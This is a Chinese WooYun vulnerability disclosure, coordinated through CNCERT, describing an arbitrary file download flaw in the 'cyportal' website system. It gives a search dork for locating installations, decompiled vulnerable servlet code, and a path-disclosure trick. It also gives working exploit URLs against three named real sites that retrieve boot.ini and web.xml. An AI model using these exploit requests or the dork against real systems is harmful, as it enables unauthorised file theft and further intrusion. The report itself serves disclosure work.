当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-072017

漏洞标题:某建站系统通用型任意文件下载漏洞(全版本通杀)

相关厂商:cncert国家互联网应急中心

漏洞作者: Coody

提交时间:2014-08-12 11:40

修复时间:2014-11-10 11:42

公开时间:2014-11-10 11:42

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-12: 细节已通知厂商并且等待厂商处理中
2014-08-17: 厂商已经确认,细节仅向厂商公开
2014-08-20: 细节向第三方安全合作伙伴开放
2014-10-11: 细节向核心白帽子及相关领域专家公开
2014-10-21: 细节向普通白帽子公开
2014-10-31: 细节向实习白帽子公开
2014-11-10: 细节向公众公开

简要描述:

任意文件下载漏洞(全版本通杀、求继续首页:P)

详细说明:

技术支持:新禾科技
版权所有:河北新禾科技(集团)有限公司 电话:0311-85265566
百度dork: inurl:cyportal (案例可参照之前的漏洞)


WooYun: 某建站系统通用型文件上传导致任意代码执行 继续看了看,发现存在任意文件下载漏洞(包括系统&应用系统本身)
反编译 DownloadServlet.class 文件,看到可直接通过参数 filePath 及 templateName 来下载目标文件

String filePath = RequestUtil.convertParameter(request.getParameter("filePath"), "iso-8859-1", "gbk");
    String templateName = RequestUtil.convertParameter(request.getParameter("templateName"), "iso-8859-1", "gbk");
    OutputStream out = response.getOutputStream();
    File f = new File(filePath + templateName);
    response.setContentType("appliaction/xml");
    String fileName = templateName;
    byte[] b1 = fileName.getBytes("GBK");
    fileName = new String(b1, "8859_1");
    response.setHeader("Content-Disposition", "attachment;filename=" + fileName);
    InputStream in = new FileInputStream(f);
    BufferedInputStream bfIn = new BufferedInputStream(in);
    Long l = new Long(f.length());
    byte[] b = new byte[l.intValue()];
    int c;
    while ((c = bfIn.read(b)) != -1)
    {
      int c;
      out.write(b, 0, c);
    }
    out.flush();
    bfIn.close();
    in.close();
    out.close();


filePath 的获取方法:
①已知的系统路径(如 c:\boot.ini ,filePath=c:/,必须以‘/’结束)
②通过访问 http://目标网站/cyportal版本号/DownloadTemplateFile?operate=all 来获取应用系统绝对路径,附上DownloadTemplateFile.java的关键代码

String operate = request.getParameter("operate");
    GenerateUtils util = new GenerateUtils();
    String rootPath = util.getProjectRootPath();
    String filePath = rootPath + "TempFile/";
    if (operate.equals("all")) {
      result = outputAllTemplateConvertXML(templateOutputService, filePath, siteID);
    }


这样一来,就可下载任意文件了(包括系统文件及应用系统)

漏洞证明:

这里给出几个漏洞利用案例:
#1 http://www.hebkjxx.cn/ 河北省会计信息网
①获取 filePath
http://www.hebkjxx.cn/cyportal1.3/DownloadTemplateFile?operate=all

QQ图片20140811231840.jpg


②下载 web.xml
http://www.hebkjxx.cn/cyportal1.3/DownloadServlet?filePath=D:/bea/user_projects/domains/hebkjxx_domain/autodeploy/cyportal1.3/WEB-INF/&templateName=web.xml

QQ图片20140811231911.jpg


#2 http://www.hbjx.com.cn/ 河北津西钢铁集团
下载 c:/boot.ini 文件
访问 http://www.hbjx.com.cn/cyportal2.0/DownloadServlet?filePath=c:/&templateName=boot.ini

QQ图片20140811232840.jpg


下载 web.xml 文件
访问 http://www.hbjx.com.cn/cyportal2.0/DownloadServlet?filePath=E:/apache-tomcat-7.0.20-jinxi/webapps/cyportal2.0/WEB-INF/&templateName=web.xml

QQ图片20140811233030.jpg


#3 http://www.bdhb.gov.cn/ 保定环境保护局
访问 http://www.bdhb.gov.cn/cyportal/DownloadTemplateFile?operate=all

QQ图片20140811233414.jpg


访问 http://www.bdhb.gov.cn/cyportal/DownloadServlet?filePath=d:/apache-tomcat-7.0.20new-bdshbj/webapps/cyportal/WEB-INF/&templateName=web.xml

QQ图片20140811233442.jpg


修复方案:

版权声明:转载请注明来源 Coody@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-08-17 09:07

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-08-12 11:43 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    没上首页

  2. 2014-08-12 11:44 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    求首页,@xsser @疯狗

  3. 2014-08-12 11:47 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @Coody 任意文件下载还能首页?现在SQL都很少上首页,除非像我一样一个系统的所有漏洞打包才能,任意文件上传都很难首页,除非数量大,无限制任意上传! @疯狗 你说是不是!拒绝一个系统多个漏洞分批提交!要就一起打包

  4. 2014-08-12 11:49 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @U神 小哥、你多虑了。。。

  5. 2014-08-12 11:51 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @Coody 能下到etc/passwd么?还是能够下载到重要文件导致getshell?

  6. 2014-08-12 11:52 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @U神 只要是存在的文件,都能下载,别说 passwd & boot.ini & 各种文件 均可下载……

  7. 2014-08-12 11:53 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    听听官方的怎么说吧 @xsser @疯狗

  8. 2014-08-12 11:54 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @Coody 得证明出来,现在审核很严格,安装量大,危害大才能首页!大神,神马系统

  9. 2014-08-12 11:55 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @U神 那必须证明了啊

  10. 2014-08-12 13:02 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @Coody 恩,必须证明,一般任意文件下载都不好上首页,没太大的危害